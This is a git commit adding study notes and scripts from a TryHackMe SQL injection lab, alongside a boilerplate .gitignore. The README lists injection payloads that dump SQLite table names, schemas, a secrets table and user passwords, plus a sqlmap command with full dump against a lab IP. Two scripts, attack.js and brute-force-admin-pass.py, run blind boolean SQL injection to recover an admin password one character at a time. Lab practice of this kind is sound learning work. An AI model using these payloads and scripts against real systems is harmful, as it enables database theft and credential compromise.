✨ add sqli notes / examples

Author: w3cj

.gitignore

@@ -0,0 +1,130 @@
+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+lerna-debug.log*
+.pnpm-debug.log*
+
+# Diagnostic reports (https://nodejs.org/api/report.html)
+report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json
+
+# Runtime data
+pids
+*.pid
+*.seed
+*.pid.lock
+
+# Directory for instrumented libs generated by jscoverage/JSCover
+lib-cov
+
+# Coverage directory used by tools like istanbul
+coverage
+*.lcov
+
+# nyc test coverage
+.nyc_output
+
+# Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files)
+.grunt
+
+# Bower dependency directory (https://bower.io/)
+bower_components
+
+# node-waf configuration
+.lock-wscript
+
+# Compiled binary addons (https://nodejs.org/api/addons.html)
+build/Release
+
+# Dependency directories
+node_modules/
+jspm_packages/
+
+# Snowpack dependency directory (https://snowpack.dev/)
+web_modules/
+
+# TypeScript cache
+*.tsbuildinfo
+
+# Optional npm cache directory
+.npm
+
+# Optional eslint cache
+.eslintcache
+
+# Optional stylelint cache
+.stylelintcache
+
+# Microbundle cache
+.rpt2_cache/
+.rts2_cache_cjs/
+.rts2_cache_es/
+.rts2_cache_umd/
+
+# Optional REPL history
+.node_repl_history
+
+# Output of 'npm pack'
+*.tgz
+
+# Yarn Integrity file
+.yarn-integrity
+
+# dotenv environment variable files
+.env
+.env.development.local
+.env.test.local
+.env.production.local
+.env.local
+
+# parcel-bundler cache (https://parceljs.org/)
+.cache
+.parcel-cache
+
+# Next.js build output
+.next
+out
+
+# Nuxt.js build / generate output
+.nuxt
+dist
+
+# Gatsby files
+.cache/
+# Comment in the public line in if your project uses Gatsby and not Next.js
+# https://nextjs.org/blog/next-9-1#public-directory-support
+# public
+
+# vuepress build output
+.vuepress/dist
+
+# vuepress v2.x temp and cache directory
+.temp
+.cache
+
+# Docusaurus cache and generated files
+.docusaurus
+
+# Serverless directories
+.serverless/
+
+# FuseBox cache
+.fusebox/
+
+# DynamoDB Local files
+.dynamodb/
+
+# TernJS port file
+.tern-port
+
+# Stores VSCode versions used for testing VSCode extensions
+.vscode-test
+
+# yarn v2
+.yarn/cache
+.yarn/unplugged
+.yarn/build-state.yml
+.yarn/install-state.gz
+.pnp.*

sql-injection/README.md

@@ -14,7 +14,36 @@
   * Run your queries with the minimum needed permissions
   * Use Stored Procedures
     * Functions in your database
-    * You'll be using ? to reference params / args
+    * You still have to use parameterized queries... but that is the conventions so you'll be less likely to do it the bad way...
 
+### Challenge #5
+
+asd',nickName='test',email='hacked
+',nickName=sqlite_version(),email='hacked
+
+* Dump sqlite table info:
+
+```SQL
+',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='
+```
+
+* Extract column names
+
+```SQL
+',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable'),email='
+```
+
+```SQL
+',nickName=(SELECT group_concat(secret) FROM secrets),email='
+```
 
 
+## Task 5
+
+',note=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),'
+
+' UNION SELECT 1,group_concat(password) FROM users-- -
+
+## Task 6
+
+sqlmap -u http://10.10.61.84:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump

sql-injection/attack.js

@@ -0,0 +1,57 @@
+const axios = require("axios");
+
+function getAllHexCodes() {
+  const hexCodes = ["{", "}"].map((c) => c.charCodeAt(0).toString(16));
+  for (let i = 97; i <= 122; i++) {
+    hexCodes.push(i.toString(16));
+  }
+  for (let i = 65; i <= 90; i++) {
+    hexCodes.push(i.toString(16));
+  }
+  for (let i = 48; i <= 57; i++) {
+    hexCodes.push(i.toString(16));
+  }
+  return hexCodes;
+}
+
+async function requestChar(query) {
+  const url = "http://10.10.61.84:5000/challenge3/login";
+  try {
+    const { status } = await axios.post(url, {
+      username: query,
+      password: "admin",
+    }, {
+      maxRedirects: 0,
+      headers: {
+        'Content-Type': 'application/x-www-form-urlencoded'
+      }
+    });
+    return false;
+  } catch (error) {
+    return error.response.status === 302;
+  }
+}
+
+async function attack() {
+  const password_len = 38;
+  const hexCodes = getAllHexCodes();
+  const passwordChars = [];
+  const promises = [];
+  for (let i = 0; i <= password_len; i++) {
+    for (let j = 0; j < hexCodes.length; j++) {
+      const code = hexCodes[j];
+      const query = `admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),${i + 1},1) = CAST(X'${code}' as Text)-- -`;
+      promises.push(requestChar(query).then((result) => {
+        if (result) {
+          const char = String.fromCharCode(parseInt(code, 16));
+          passwordChars[i] = char;
+          console.log('Found', i, 'char:', char);
+        }
+      }))
+    }
+  }
+  await Promise.all(promises);
+  console.log('Password:', passwordChars.join(''));
+}
+
+attack();

sql-injection/brute-force-admin-pass.py

@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+import sys
+import requests
+import string
+
+
+def send_p(url, query):
+    payload = {"username": query, "password": "admin"}
+    try:
+        r = requests.post(url, data=payload, timeout=3)
+    except requests.exceptions.ConnectTimeout:
+        print("[!] ConnectionTimeout: Try to adjust the timeout time")
+        sys.exit(1)
+    return r.text
+
+
+def main(addr):
+    url = f"http://{addr}/challenge3/login"
+    flag = ""
+    password_len = 38
+    # Not the most efficient way of doing it...
+    for i in range(1, password_len):
+        for c in string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}":
+            # Convert char to hex and remove "0x"
+            h = hex(ord(c))[2:]
+            query = "admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1)," \
+                f"{i},1)=CAST(X'{h}' AS TEXT)--"
+
+            resp = send_p(url, query)
+            if not "Invalid" in resp:
+                flag += c
+                print(flag)
+    print(f"[+] FLAG: {flag}")
+
+
+if __name__ == "__main__":
+    if len(sys.argv) == 1:
+        print(f"Usage: {sys.argv[0]} MACHINE_IP:PORT")
+        sys.exit(0)
+    main(sys.argv[1])

sql-injection/package-lock.json

@@ -0,0 +1,15 @@
+{
+  "name": "sql-injection",
+  "version": "1.0.0",
+  "description": "* Notes from Try Hack Me:   * https://tryhackme.com/room/sqlilab",
+  "main": "attack.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "axios": "^1.6.5"
+  }
+}